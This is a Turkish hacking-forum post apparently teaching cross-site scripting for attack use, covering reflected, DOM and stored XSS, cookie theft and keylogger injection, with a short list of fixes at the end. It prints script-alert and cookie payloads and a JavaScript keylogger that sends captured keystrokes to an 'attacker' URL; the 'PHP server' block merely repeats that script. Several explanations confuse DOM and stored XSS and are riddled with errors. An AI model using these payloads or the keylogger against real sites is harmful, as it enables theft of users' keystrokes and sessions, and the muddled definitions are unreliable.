Turkhackteam.net/org - Turkish Hacking & Security Platform  
Geri git   Turkhackteam.net/org - Turkish Hacking & Security Platform >
Turkhackteam Under Ground
> Web & Server Güvenliği

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.





XSS ( Cross-Site Scripting) //ivanwasilevic

Web & Server Güvenliği

Yeni Konu aç Cevapla
 
Seçenekler
Alt 2 Hafta önce   #1
  • Forumdan Uzaklaştırıldı
  • Üye Bilgileri
Üyelik tarihi
10/2018
Nereden
Tahmin Et
Yaş
17
Mesajlar
Konular

Teşekkür (Etti): 232
Teşekkür (Aldı): 247


XSS ( Cross-Site Scripting) //ivanwasilevic





Merhaba değerli TürkHackTeam ailesi bu gün sizlere XSS ( Cross-Site Scripting) konusunu anlatacağım.Hemen konuya geçelim.

KONU BAŞLIKLARI



• Reflected XSS

• DOM XSS

• Stored XSS

• XSS Zafiyetinin Verebileceği Zararlar

• *Çerez Hırsızlığı

• *Kimlik Hırsızlığı

• *Keylogger Ekleme

• XSS Zafiyeti Çözümü



Reflected XSS




XSS türleri arasından en çok karşılaşılan türdür.Bir nevi en az zarar verebilecek türdür.Bunun sebebi bizim hazırladığımız bir link olacaktır ve hedefe gönderip kabul ettirmemizdendir.Sosyal mühendislik bu konuda çok önemlidir.Burada ki tüm iş bizim zekamız ve hayal gücümüze bağlıdır.Şimdi hep beraber örnek bir sitede Reflected XSS açığı arayalım.Bizler bir kullanıcı olarak girdiğimiz sitede (örneğin bu market,oyuncak sitesi olabilir)arayacağımız şeyler bellidir. "oyuncak silah , çamaşır suyu vb."HTML/CSS/JS programlama dillerinden arama kutucuğuna komutlar yazıp çalıştırırsak ve yanıt gelirse üstelik bu yanıtı biz görebiliyorsak Refleceted XSS açığından söz edebiliriz.Hedef siteye girelim ve arama kutucuğu,ziyaretçi yorum bölümlerine yazıp deneyelim.

Kod:
<script>alert("xss");</script>




İşlemini gerçekleştirdikten sonra gereken cevap alındıktan sonra cookie eklenir.


Kod:
><script>alert(d/o/c/u/m/e/n/t.cookie);</script>
/ hariç

DOM XSS





Bana göre web güvenlik açıklarının en kolayı, en basiti dom xss açığıdır.Dom XSS açığının en temel belirtisi ve özelliği girilen girdiyi veritabanına direk kaydetmesidir.Yani sizin girdi yapılan kısıma yazdığınız kodları veritabanına işler ve sitede çalışır.Dom XSS açığı genellikle ziyaretçi yorumu,üye kaydı vb. veritabanı ile etkileşime girilen yerlerde oluyor.XSS saldırılarının en tehlikelisidir.

Kod:
<script>alert(/xss/)</script>







Stored XSS





Strod XSS türünde HTML kodlarımızı yerleştirir,veritabanına yerleşir ve saldırı gerçekleşir.DOM XSS türündeki saldırıda hedefe JS kodları yerleştirmiştik Stored XSS ise HTML kodları yerleştirilir.



XSS Zafiyetinin Verebileceği Zararlar



XSS öneml, b,r zafiyet önemi artıkça oluşabilecek tehdit ve zaralarda artıyor.Örneğin XSS zafiyeti bulunan bir web adresinde çeşitli k0omutlar ile url yönlendirilmesi yapılabilir.Yönlendirilen url'den kullanıcı cihaza rat,keylogger vb. yszılımlar yüklenebilir.

• Web veritabanı hacklenmesi

• Veri tabanında bulunan bilgilerin çalınması

• Kullanıcı Cookie çalınması

• Web veritabanından bulunan özel belge,dökünman çalınması

• Kimlik hırsızlığı

• XSS zafiyetin bulunan web adresi üzerinden url yönlenndirmesi

• Kullanıcıların cihazlarına keylogger vb. zaralı yazılım yüklenmesi

• Web takip






Çerez Hırsızlığı




Çerezler diğer adıyla Cookie'dir.Çerezler bir web adresi üstünde bıraktığımız izlere denir.Örneğin THT girdiğimizde kullanıcı adını yazacağımız zaman Alt kurtucukta kullanıcı adımızın çıkmasıdır.Tabi daha önce belli sıklıkla girmiş olmamız lazım.Şuna bezetebiliriz.Karda yürürken ayak izlerimizin çıkması.XSS bu böyle birşeydir.Kullanıcının çerezleri çalındığı vakit kullanıcının girdiği yerler kaydedilen şifre,rumuz vedahası bulunabilir.Bir web adresinde XSS zaafiyetinin bulundu vakit saldırgan komutlar ile çerezleri çalmaya çalışır.

Kod:
><script>alert(d/o/c/u/m/e/n/t.cookie);</script>
/ hariç

Kimlik Hırsızlığı




Kimlik hırsızlığı da en önemli tehditlenrden biridir.Saldırgan hedefe aldığı sistemi takip altına alır ve kullanıcı avına çıkar.Yukarıda behsettiğimiz gibi saldırgan url yönlendirmesinde bulunabilir ve böylelikle kullanıcıların cihazlarına yazarlı yazılım yüklemesi yapar.Böylelik web adresi üzerinden kurban kullanıcı sayısı artar.Kullanıcıların kişisel bilgileri,özel yazışma,belge vb. dosyaların alınması ve kullanıcı ifşası yapılabilir.



Keylogger Ekleme



DVWA sistemler ile birlikte XSS zafiyeti bulunan bir sisteme keylogger eklemek mümkündür.Bunu yönlendirme ile de yapılabilir veya hedef web adresine de eklenebilir.Genellikle saldırgan cookie çalmak için kullanıcı takliti yapar ama bazen bu yetersiz olabilir.Çünkü kullanıcının hangi tuşlara bastığını izlemek daha kolaylık sağlayabilir.

JS Keylogger
Kod:
var buffer = [];
var attacker = 'http://hedef='

********.onkeypress = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp
    };
    buffer.push(stroke);
}

window.setInterval(function() {
    if (buffer.length > 0) {
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = attacker + data;
        buffer = [];
    }
}, 200);
PHP Keylogger Sunucusu
Kod:
var buffer = [];
var attacker = 'http://hedef/?c='

********.onkeypress = function(e) {
    var timestamp = Date.now() | 0;
    var stroke = {
        k: e.key,
        t: timestamp
    };
    buffer.push(stroke);
}

window.setInterval(function() {
    if (buffer.length > 0) {
        var data = encodeURIComponent(JSON.stringify(buffer));
        new Image().src = attacker + data;
        buffer = [];
    }
}, 200);

XSS Zafiyeti Çözümü



• Girdi denetimi sağlanması yani siteyi ziyaret eden kullanıcı profili nasıl oluyorsa olsun güvenilir olmayan kaynaklardan gelen verilerin denetim altına alınması

• Çıktı denetimi Web sayfalarında HTML ve JS başlık girdilerine izin verilebilir.Bu durumlarda izin verilen başlıkların kontrol edilmesi

• JS güvenlik modelleri sunucudan gönderilen verilerin kendi sandboxlarında çalışıp kullanıcının özel belge,resim ve kişisel bilgilere kullanıcı ağı üzerinden erişilmemesini sağlamak




Bir konunun daha sonuna geldik arkadaşlar okuduğunuz için teşekkür ederim saygılarımla....








Konu ivanwasilevic tarafından ( 2 Hafta önce Saat 11:54 ) değiştirilmiştir..
 Offline  
 
Alıntı ile Cevapla
Teşekkür

CassPort, LETRX, Boratov Teşekkür etti.
Cevapla

Bookmarks

Seçenekler


Bilgilendirme Turkhackteam.net/org
Sitemizde yer alan konular üyelerimiz tarafından paylaşılmaktadır.
Bu konular yasalara uygunluk ve telif hakkı konusunda yönetimimiz tarafından kontrol edilse de, gözden kaçabilen içerikler yer alabilmektedir.
Bu tür konuları turkhackteamiletisim [at] gmail.com mail adresimize bildirebilirsiniz, konular hakkında en kısa sürede gerekli işlemler yapılacaktır.
Please Report Abuse, DMCA, Harassment, Scamming, Warez, Crack, Divx, Mp3 or any Illegal Activity to turkhackteamiletisim [at] gmail.com

Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz.
Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
Siber Güvenlik
sosyal medya bayilik paneli

wau